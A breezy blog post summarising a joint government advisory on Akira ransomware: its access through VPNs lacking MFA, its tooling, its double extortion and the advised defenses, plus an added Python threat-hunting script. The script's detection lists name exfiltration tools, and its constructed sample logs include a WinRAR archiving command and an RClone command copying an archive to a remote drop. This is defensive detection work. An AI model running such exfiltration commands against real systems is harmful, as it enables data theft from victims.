Unleashing the Beast: The Rise of Akira Ransomware and How to Fight Back
In a united front against Akira ransomware, the FBI, CISA, Europol's EC3, and NCSC-NL have published a joint Cybersecurity Advisory. It lays out the group's latest tactics, techniques, and indicators of compromise so that organizations can tune their defenses. With Akira's global impact escalating, the agencies urge adopting robust mitigations now rather than after the ransom note lands. Stay informed at…
Hot Take:
Who needs a thriller when you have the Akira ransomware saga? As it morphs and multiplies, grabbing cash and crippling systems, it's like watching a cybercrime blockbuster, minus the popcorn. The latest feature? A joint advisory from the cyber-superheroes at the FBI, CISA, Europol's European Cybercrime Centre (EC3), and the Dutch NCSC. Buckle up, it's going to be a bumpy ride!
- Akira ransomware has been wreaking havoc since March 2023, hitting organizations across North America, Europe, and Australia, and has bagged roughly $42 million in ransom payments (as of January 1, 2024).
- The ransomware has evolved from Windows-only to also hitting Linux systems, specifically VMware ESXi hosts, with newer variants such as Megazord and Akira_v2.
- Initial access is most often through VPN services that lack multifactor authentication (MFA), frequently by exploiting known vulnerabilities in Cisco VPN products.
- Akira runs a double-extortion play: it exfiltrates data first, then encrypts systems, and its ransom note points victims to a .onion URL; payment instructions only appear once the victim makes contact.
- The agencies recommend the usual robust defenses, including MFA, regular patching, and network segmentation, and, importantly, not paying the ransom, which only fuels the cybercrime economy.
Need to know more?
The Evolutionary Leap
From humble C++ beginnings to a Rust-based powerhouse (the Megazord variant), Akira has gone all "Transformers" on us, upgrading its extortion capabilities along the way. Early 2023 saw Akira sticking to Windows, but by April 2023 it had its cyber tentacles around Linux too, specifically VMware ESXi hosts. The actors seem to have a flair for dramatic naming as well: encrypted files get extensions like .akira and .powerranges. Yes, you read that right, Power Rangers.
The Art of Breaking In
These cyber villains are sneaky. They slide into networks through VPN services that skipped the MFA memo, using known Cisco vulnerabilities as their backdoor keys. Once inside, they start the party by disabling security software, then lean on remote-access tools like AnyDesk and MobaXterm to keep a foothold and move through the network.
Grab and Encrypt
Akira doesn't just lock up your data; first it takes a copy, so the crew can still haunt you with a leak even if you recover cleanly from backups. They archive your precious files with WinRAR and ship them off to their lairs with RClone. Only after making sure they've left no stone unturned (or file unencrypted) do they drop a ransom note, containing a code unique to each victim, that tells you how to reach out and pay up in Bitcoin.
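The two sections above (the remote-access tooling used after the break-in, and the archive-then-exfiltrate-then-encrypt sequence) describe behaviour you can hunt for. The following is an added example, not code from the advisory or from the authoring agencies: a small Python script that scans endpoint and VPN events for the indicators this page names (VPN logins without MFA, AnyDesk and MobaXterm launches, WinRAR and RClone launches, and files renamed to .akira or .powerranges) and flags a host where exfiltration tooling ran before an encryption burst. The log format, the sample events, the host names and the burst threshold are all constructed for the example.

```python
"""Hunt for Akira-style tradecraft in a constructed event stream (added example)."""
import re
from collections import defaultdict

# Process names the advisory summary associates with Akira hands-on-keyboard activity.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "mobaxterm.exe"}
EXFIL_TOOLS = {"winrar.exe", "rar.exe", "rclone.exe", "rclone"}
# Extensions Akira appends to files it has encrypted.
RANSOM_EXTENSIONS = (".akira", ".powerranges")
# Constructed threshold: this many renamed files on one host is treated as an encryption run.
ENCRYPTION_BURST = 3

# Constructed sample telemetry: "timestamp host kind key=value ..." (not real logs).
SAMPLE_EVENTS = [
    r'2024-04-18T01:02:03Z vpn-gw vpn_login user=jdoe src=203.0.113.7 mfa=false',
    r'2024-04-18T01:15:40Z fs01 process_create image="C:\Users\jdoe\AppData\Local\AnyDesk\AnyDesk.exe" user=jdoe',
    r'2024-04-18T01:40:12Z fs01 process_create image="C:\Program Files\WinRAR\WinRAR.exe" cmdline="a -r finance.rar D:\Finance"',
    r'2024-04-18T01:55:00Z fs01 process_create image="C:\Tools\rclone.exe" cmdline="copy finance.rar remote:drop"',
    r'2024-04-18T03:10:01Z fs01 file_rename path="D:\Finance\q1.xlsx.akira"',
    r'2024-04-18T03:10:01Z fs01 file_rename path="D:\Finance\q2.xlsx.akira"',
    r'2024-04-18T03:10:02Z fs01 file_rename path="D:\Finance\budget.docx.powerranges"',
    r'2024-04-18T08:00:00Z ws42 process_create image="C:\Program Files\WinRAR\WinRAR.exe" user=alice',
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<kind>\S+)\s*(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one constructed-format line into a dict, or return None if it does not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = {"ts": m["ts"], "host": m["host"], "kind": m["kind"]}
    for key, value in KV_RE.findall(m["rest"]):
        event[key] = value.strip('"')
    return event


def tag_event(event):
    """Return the indicator tags (possibly none) that a single event triggers."""
    tags = []
    kind = event["kind"]
    if kind == "vpn_login" and event.get("mfa", "").lower() == "false":
        tags.append("vpn_login_without_mfa")
    if kind == "process_create":
        # Basename of the image path, whichever separator the source used.
        image = event.get("image", "").rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
        if image in REMOTE_ACCESS_TOOLS:
            tags.append("remote_access_tool")
        if image in EXFIL_TOOLS:
            tags.append("archive_or_sync_tool")
    if kind in ("file_rename", "file_create"):
        if event.get("path", "").lower().endswith(RANSOM_EXTENSIONS):
            tags.append("ransom_extension")
    return tags


def hunt(lines):
    """Aggregate indicator tags per host and flag the exfiltrate-then-encrypt sequence."""
    per_host = defaultdict(lambda: {"tags": set(), "ransom_files": 0,
                                    "first_exfil_ts": None, "first_ransom_ts": None})
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        tags = tag_event(event)
        if not tags:
            continue
        rec = per_host[event["host"]]
        rec["tags"].update(tags)
        if "archive_or_sync_tool" in tags and rec["first_exfil_ts"] is None:
            rec["first_exfil_ts"] = event["ts"]
        if "ransom_extension" in tags:
            rec["ransom_files"] += 1
            if rec["first_ransom_ts"] is None:
                rec["first_ransom_ts"] = event["ts"]
    findings = {}
    for host, rec in per_host.items():
        encrypting = rec["ransom_files"] >= ENCRYPTION_BURST
        # Double extortion: archive/sync tooling ran, then a burst of renamed files followed.
        # ISO-8601 UTC timestamps compare correctly as strings.
        exfil_first = (rec["first_exfil_ts"] is not None and encrypting
                       and rec["first_exfil_ts"] < rec["first_ransom_ts"])
        findings[host] = {
            "tags": sorted(rec["tags"]),
            "encryption_burst": encrypting,
            "double_extortion_pattern": exfil_first,
        }
    return findings


if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS).items():
        print(host, finding)
```

Note that a single WinRAR launch on ws42 only earns a tag, not a finding: archiving tools are everyday software, and it is the combination with an encryption burst on the same host, in that order, that makes the activity look like Akira rather than a user zipping up a folder. In a real deployment the event source would be your EDR or SIEM export rather than the constructed list above.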
Defense: The Best Offense
The advisory doesn't just spell doom; it offers a shield too. The recommendations are the classics: patch and update systems, segment networks, and enforce MFA like your network's life depends on it (because it does!). Also on the list is monitoring for abnormal activity, such as unexpected remote-access tools or unusual VPN logins, which can be the first sign of a breach. The agencies are firm that paying the ransom is a bad idea, so the goal is to harden things enough that Akira's actors never get the chance to lock anything down in the first place.
Not Just a Warning—A Resource
It's not all gloom and doom. The advisory serves up a silver lining with resources like StopRansomware.gov, offering tools and guidance to help keep the digital boogeymen at bay. So, while Akira might be out there leveling up, the good guys aren't exactly sitting ducks. They're more like sitting hackers, armed with firewalls, endpoint protection, and a staunch no-ransom policy.
The cyber realm might be a battlefield, but with advisories like these, at least we're not heading into battle unarmed. So, patch those systems and turn on MFA, folks, and maybe, just maybe, we can turn the tide against our digital adversaries.